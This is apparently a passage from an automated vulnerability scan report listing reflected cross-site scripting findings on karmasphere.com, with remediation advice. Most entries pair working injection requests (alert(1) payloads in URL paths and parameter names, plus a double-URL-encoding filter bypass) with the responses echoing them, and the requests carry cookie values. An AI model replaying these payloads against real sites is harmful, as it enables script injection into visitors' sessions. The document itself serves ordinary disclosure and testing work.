HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 02:57:05 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:57:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 36141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <19636';alert(1)//83cc3c5973a=1&title=Big Data Analytics for Business Professionals | Karmasphere&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa9f5'%3balert(1)//e1726f0480d was submitted in the REST URL parameter 1. This input was echoed as aa9f5';alert(1)//e1726f0480d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Informationaa9f5'%3balert(1)//e1726f0480d/overview.html HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:00:45 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:00:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Products-Informationaa9f5';alert(1)//e1726f0480d/overview.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 451a1'%3balert(1)//79e81dceac was submitted in the REST URL parameter 2. This input was echoed as 451a1';alert(1)//79e81dceac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Information/451a1'%3balert(1)//79e81dceac HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:01:49 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:01:49 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Products-Information/451a1';alert(1)//79e81dceac&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.56. http://karmasphere.com/Products-Information/overview.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://karmasphere.com
Path:
/Products-Information/overview.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54547'%3balert(1)//a20b0dd2987 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54547';alert(1)//a20b0dd2987 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Information/overview.html?54547'%3balert(1)//a20b0dd2987=1 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 02:59:44 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:59:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <54547';alert(1)//a20b0dd2987=1&title=Big Data Intelligence Made Easy Using the Power of Apache Hadoop&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckg ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49111'%3balert(1)//1ee4cbe38e9 was submitted in the REST URL parameter 1. This input was echoed as 49111';alert(1)//1ee4cbe38e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Resource-Center49111'%3balert(1)//1ee4cbe38e9/resource-center-index.html HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:02:43 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:02:43 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Resource-Center49111';alert(1)//1ee4cbe38e9/resource-center-index.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weitervera ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9877d'%3balert(1)//b0e98dcb2fa was submitted in the REST URL parameter 2. This input was echoed as 9877d';alert(1)//b0e98dcb2fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Resource-Center/9877d'%3balert(1)//b0e98dcb2fa HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:03:37 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:03:38 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Resource-Center/9877d';alert(1)//b0e98dcb2fa&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.59. http://karmasphere.com/Resource-Center/resource-center-index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://karmasphere.com
Path:
/Resource-Center/resource-center-index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a591d'%3balert(1)//152def7f262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a591d';alert(1)//152def7f262 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Resource-Center/resource-center-index.html?a591d'%3balert(1)//152def7f262=1 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 03:02:00 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:02:01 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31492
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <a591d';alert(1)//152def7f262=1&title=Big Data Intelligence from Karmasphere | Resource Center&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, da ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2906d'%3balert(1)//e67629a9c92 was submitted in the REST URL parameter 1. This input was echoed as 2906d';alert(1)//e67629a9c92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Table2906d'%3balert(1)//e67629a9c92/Press-Releases/ HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:02:55 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:02:55 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Table2906d';alert(1)//e67629a9c92/Press-Releases/&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wir ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1b06'%3balert(1)//c0a03236de3 was submitted in the REST URL parameter 2. This input was echoed as c1b06';alert(1)//c0a03236de3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Table/Press-Releasesc1b06'%3balert(1)//c0a03236de3/ HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:03:49 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:03:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Table/Press-Releasesc1b06';alert(1)//c0a03236de3/&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tr ...[SNIP]...
3.62. http://karmasphere.com/Table/Press-Releases/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://karmasphere.com
Path:
/Table/Press-Releases/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3288d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc97bbbe545 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3288d"><script>alert(1)</script>cc97bbbe545 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Table/Press-Releases/?3288d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc97bbbe545=1 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 03:02:10 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:02:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34551
3.63. http://karmasphere.com/Table/Press-Releases/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://karmasphere.com
Path:
/Table/Press-Releases/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9709c'%3balert(1)//fef8edcf38a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9709c';alert(1)//fef8edcf38a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Table/Press-Releases/?9709c'%3balert(1)//fef8edcf38a=1 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 03:02:21 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:02:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <9709c';alert(1)//fef8edcf38a=1&title=Big Data Intelligence from Karmasphere | News&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Eve ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7600a'%3balert(1)//6de48c2196c was submitted in the REST URL parameter 4. This input was echoed as 7600a';alert(1)//6de48c2196c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /components/com_rsform/controller/7600a'%3balert(1)//6de48c2196c HTTP/1.1 Host: karmasphere.com Proxy-Connection: keep-alive Referer: http://karmasphere.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; __utmc=213720718; __utmb=213720718.1.10.1296478383; wp=BYBDDDDDDTTHTCX; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:03:16 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:03:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34764
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/components/com_rsform/controller/7600a';alert(1)//6de48c2196c&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8570'%3balert(1)//da627bcc128 was submitted in the REST URL parameter 1. This input was echoed as c8570';alert(1)//da627bcc128 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kspec8570'%3balert(1)//da627bcc128/purchase.html HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
